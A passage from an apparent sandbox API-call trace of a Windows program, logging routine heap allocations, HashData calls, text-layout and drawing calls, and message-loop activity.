cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.059] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0172.059] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0172.059] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.059] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.059] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.059] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.060] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.060] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0172.060] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0172.060] HashData (in: pbData=0x9f82f24, cbData=0x4, pbHash=0x9f82f28, cbHash=0x2 | out: pbHash=0x9f82f28) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.060] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.060] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0172.060] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0172.060] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.060] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.060] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.061] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.061] GetFocus () returned 0x103e2 [0172.061] GetFocus () returned 0x103e2 [0172.061] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.061] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0172.061] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0172.061] _CIsqrt () returned 0x407b027f [0172.061] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.062] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.062] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd8f8 [0172.062] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.062] HashData (in: pbData=0xd94f60, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0172.063] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd8f8 | out: hHeap=0x5e0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.063] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.063] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0172.063] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0172.063] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.063] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.063] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.063] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.063] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.064] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.064] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.064] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.064] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.064] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.064] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0172.064] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.064] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.064] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.064] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.064] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.064] GetFocus () returned 0x103e2 [0172.064] GetFocus () returned 0x103e2 [0172.065] GetFocus () returned 0x103e2 [0172.065] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.065] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.065] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.065] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.065] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.065] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.066] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0172.066] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.066] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.066] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.066] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.066] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.066] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.066] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.067] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0172.069] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.069] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0172.069] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0172.070] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0172.070] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0172.070] LsSetDoc () returned 0x0 [0172.070] LsCreateLine () returned 0x0 [0172.071] LsDisplayLine () returned 0x0 [0172.073] LsDestroyLine () returned 0x0 [0172.073] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.073] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0172.073] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e78 [0172.073] HashData (in: pbData=0x9f831c4, cbData=0x4, pbHash=0x9f831c8, cbHash=0x2 | out: pbHash=0x9f831c8) returned 0x0 [0172.073] HashData (in: pbData=0x6d7e78, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.073] HashData (in: pbData=0x6d7e7a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e8c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e94, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e96, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7e98, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7ea0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.074] HashData (in: pbData=0x6d7eac, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.074] HashData (in: pbData=0x6d7eb4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7ec0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.074] HashData (in: pbData=0x6d7ec4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.074] HashData (in: pbData=0x6d7ecc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7ed8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.074] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e78 | out: hHeap=0x5e0000) returned 1 [0172.074] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0172.074] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.074] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.074] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.074] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.074] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.074] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0172.074] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0172.074] HashData (in: pbData=0x9f830d4, cbData=0x4, pbHash=0x9f830d8, cbHash=0x2 | out: pbHash=0x9f830d8) returned 0x0 [0172.074] HashData (in: pbData=0x6d7778, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d777a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d777c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.075] HashData (in: pbData=0x6d7784, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d778c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d7794, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d7796, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d7798, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d77a0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.075] HashData (in: pbData=0x6d77ac, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.075] HashData (in: pbData=0x6d77b4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d77c0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.075] HashData (in: pbData=0x6d77c4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.075] HashData (in: pbData=0x6d77cc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.075] HashData (in: pbData=0x6d77d8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.075] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0172.075] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0172.075] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.075] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.075] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.075] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0172.076] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.076] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0172.076] _CIsqrt () returned 0x407b027f [0172.076] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0172.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.076] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddad8 [0172.077] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.077] HashData (in: pbData=0xd94fc0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0172.077] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddad8 | out: hHeap=0x5e0000) returned 1 [0172.078] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0172.078] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0172.078] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0172.078] HashData (in: pbData=0x9f8302c, cbData=0x4, pbHash=0x9f83030, cbHash=0x2 | out: pbHash=0x9f83030) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.078] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.078] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0172.078] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0172.078] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.078] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.078] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.079] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0172.079] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.079] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.079] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.079] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.079] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.079] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.079] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0172.080] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.080] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.080] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.080] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.080] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.080] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.080] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0172.081] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.081] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.082] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.082] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.083] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0172.084] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0172.084] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0172.085] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0172.085] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68be38 | out: hHeap=0x5e0000) returned 1 [0172.096] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0172.096] BitBlt (hdc=0xb010541, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0172.096] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0172.097] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0172.097] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099091593862) returned 1 [0172.097] DeleteObject (ho=0x26040a81) returned 1 [0172.098] GetCurrentThreadId () returned 0xb48 [0172.098] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.098] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099091682690) returned 1 [0172.098] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099091714621) returned 1 [0172.098] KillTimer (hWnd=0x30316, uIDEvent=0x2019) returned 1 [0172.099] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.099] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.099] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.099] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0172.099] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.099] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: 